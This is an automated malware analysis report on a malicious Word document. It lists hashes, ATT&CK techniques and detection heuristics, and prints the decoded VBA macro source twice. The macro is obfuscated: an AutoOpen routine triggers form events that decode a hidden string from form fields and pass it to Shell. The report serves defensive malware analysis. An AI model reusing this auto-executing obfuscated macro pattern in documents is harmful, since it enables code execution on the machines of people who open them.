Office (OLE) malware analysis — malicious · 28b6fc2bee80bd7e

MALICIOUS

Office (OLE)

209.0 KB Created: 2018-11-30 13:04:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: a88a43f21136c7cfe6b54f041bc1c056 SHA-1: d5f030a1559ac0e4d4da828cdd2f2fc7f66b53bd SHA-256: 28b6fc2bee80bd7e66950d7f2e75d26b1d39e17c15171f813a0e75d9ab049ec9

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Autoopen macro is present and calls the PageAllForms function with the string 'sa' concatenated from 'sa' + 've'. This suggests an attempt to execute arbitrary code, likely for downloading and executing a secondary payload. The presence of the Shell() call in VBA and the AutoOpen macro are critical indicators of malicious intent.

Heuristics 6

ClamAV: Doc.Malware.00536d-6769015-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6769015-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2772 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2772 bytes
SHA-256: `dd397c19478e22c45304ab336dce5508a79ae63ca065111a06ed988bdf006d4b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Autoopen() Dim st1 As String st1 = "sa" + "ve" PageAllForms st1 End Sub Attribute VB_Name = "Form1" Attribute VB_Base = "0{18598BD2-9617-44D3-8A8F-33A406A79DBE}{61FD6585-2F0E-4C38-A83C-524941834E73}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub ComboBox1_Change() End Sub Private Sub LastText_Change() Dim lev2 As Integer lev2 = Len(Form1.LastText) Dim lev1 As String lev1 = "A" fh = "2" lang_xw2 lev2 End Sub Private Sub EditText1_Change() Dim ind1 As String ind1 = "1" + "001" End Sub Private Sub CommandButton1_Click() End Sub Private Sub CommandButton2_Click() End Sub Private Sub TextBox1_Change() Dim s As String s = " " s = s + Form1.Text1 If Len(s) = 63 Then lang_xot End Sub Attribute VB_Name = "Module1" Sub red_fix(ByRef b1, ByRef control, Cell1) log2 = 1 With Form1 log2 = Len(.Text1) If b1 < log2 Then b = "" doc_print_body .Text1, b1, b If Cell1 <> b Then b1 = b1 + 1 red_fix b1, control, Cell1 Else control = b1 End If End If End With End Sub Sub DataFindChars(ext1, ByRef state_max) Dim m1 As Integer m1 = -1 state_max = "" If ext1 = m1 Then ext1 = m1 End If If ext1 < 1 Then doc_print_body Form1.Text1, Len(Form1.Text1) + ext1, state_max Else doc_print_body Form1.Text1, ext1, state_max End If End Sub Sub diggites_replace(C1, ByRef op) op = "" st1 = 1 replacediggites st1, op, C1 End Sub Sub replacediggites(ByRef pointA, ByRef need, later) f_str = Len(later) If pointA <= f_str Then ch = "" doc_print_body later, pointA, ch idial = 1 strings_attached ch, idial st = "" DataFindChars idial - 2, st need = need + st pointA = pointA + 1 replacediggites pointA, need, later End If End Sub Sub PageAllForms(s1) s1 = s1 + "OK" Form1.TextBox1 = s1 End Sub Sub doc_print_body(a1, pB, ByRef rmin) s1 = Left(a1, pB) s1 = s1 + "" rmin = Right(s1, 1) End Sub Sub lang_xot() Dim str2 As String diggites_replace Form1.date1, str2 Form1.EditText1 = str2 str2 = str2 + "" Form1.LastText = str2 End Sub Sub lang_xw2(m) Dim j As Integer Dim str1 As String With Form1 j = 517 - m str1 = "" + .LastText End With If 0 = j Then Shell str1, j End Sub Sub strings_attached(per2, ByRef arg1) arg1 = 0 sb1 = 1 red_fix sb1, arg1, per2 End Sub

SHA-256: dd397c19478e22c45304ab336dce5508a79ae63ca065111a06ed988bdf006d4b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Autoopen()
Dim st1 As String
st1 = "sa" + "ve"
PageAllForms st1
End Sub




Attribute VB_Name = "Form1"
Attribute VB_Base = "0{18598BD2-9617-44D3-8A8F-33A406A79DBE}{61FD6585-2F0E-4C38-A83C-524941834E73}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub ComboBox1_Change()

End Sub

Private Sub LastText_Change()
Dim lev2 As Integer
lev2 = Len(Form1.LastText)
Dim lev1 As String
lev1 = "A"
fh = "2"
lang_xw2 lev2
End Sub


Private Sub EditText1_Change()
Dim ind1 As String
ind1 = "1" + "001"
End Sub

Private Sub CommandButton1_Click()

End Sub


Private Sub CommandButton2_Click()

End Sub

Private Sub TextBox1_Change()
Dim s As String
s = " "
s = s + Form1.Text1
If Len(s) = 63 Then lang_xot
End Sub


Attribute VB_Name = "Module1"
Sub red_fix(ByRef b1, ByRef control, Cell1)
log2 = 1
With Form1
log2 = Len(.Text1)
If b1 < log2 Then
b = ""
doc_print_body .Text1, b1, b
If Cell1 <> b Then
b1 = b1 + 1
red_fix b1, control, Cell1
Else
control = b1
End If
End If
End With
End Sub


Sub DataFindChars(ext1, ByRef state_max)
Dim m1 As Integer
m1 = -1
state_max = ""
If ext1 = m1 Then
ext1 = m1
End If
If ext1 < 1 Then
doc_print_body Form1.Text1, Len(Form1.Text1) + ext1, state_max
Else
doc_print_body Form1.Text1, ext1, state_max
End If
End Sub

Sub diggites_replace(C1, ByRef op)
op = ""
st1 = 1
replacediggites st1, op, C1
End Sub


Sub replacediggites(ByRef pointA, ByRef need, later)
f_str = Len(later)
If pointA <= f_str Then
ch = ""
doc_print_body later, pointA, ch
idial = 1
strings_attached ch, idial
st = ""
DataFindChars idial - 2, st
need = need + st
pointA = pointA + 1
replacediggites pointA, need, later
End If
End Sub

Sub PageAllForms(s1)
s1 = s1 + "OK"
Form1.TextBox1 = s1
End Sub

Sub doc_print_body(a1, pB, ByRef rmin)
s1 = Left(a1, pB)
s1 = s1 + ""
rmin = Right(s1, 1)
End Sub

Sub lang_xot()
Dim str2 As String
diggites_replace Form1.date1, str2
Form1.EditText1 = str2
str2 = str2 + ""
Form1.LastText = str2
End Sub

Sub lang_xw2(m)
Dim j As Integer
Dim str1 As String
With Form1
j = 517 - m
str1 = "" + .LastText
End With
If 0 = j Then Shell str1, j
End Sub

Sub strings_attached(per2, ByRef arg1)
arg1 = 0
sb1 = 1
red_fix sb1, arg1, per2
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.